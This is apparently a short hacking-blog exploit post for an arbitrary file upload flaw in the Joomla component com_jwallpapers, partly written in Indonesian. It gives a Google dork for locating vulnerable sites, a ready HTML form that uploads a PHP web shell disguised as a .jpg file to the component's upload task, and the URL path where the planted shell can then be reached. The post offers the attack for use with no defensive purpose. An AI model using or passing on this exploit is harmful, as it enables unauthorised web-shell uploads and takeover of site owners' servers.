Joomla Component com_jwallpapers Arbitrary File Upload

==================================================================
Title: Joomla Component com_jwallpapers Arbitrary File Upload
Google Dork: inurl:/index.php?option=com_jwallpapers
vuln: /index.php?option=com_jwallpapers&task=upload
output vuln: {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
Thanks to: you
Greetz: Sector Security Tester
==================================================================
CSRF Xploit Code:
  1. <html>
  2. <body>
  3. <form method="post" action="http://www.target.com/index.php?option=com_jwallpapers&task=upload" enctype="multipart/form-data">
  4. <input type="file" name="file"/>
  5. <input type="hidden" name="name" value="shell_kalian.php" />
  6. <input type="submit" value="submit"/>
  7. </form>
  8. </body>
  9. </html>


NB: Ubah bagian shell_kalian.php dengan nama shell yang kalian ingin kan ( ex: shell.php ), dan juga shell yang kalian upload harus ber-extensi .jpg (ex: shell.jpg). Tanpa haarus menggunakan tamper data dan sebagainyaa.

Setelah Kalian Xploit, maka hasilnya akan tetap sama seperti ini:

tidak ada tulisan error sama sekali.
Shell akses: http://target.com/jwallpapers_files/plupload/shell_kalian.php

KOMENTARLAH DENGAN SOPAN :)
MULUTMU HARIMAUMU :)
EmoticonEmoticon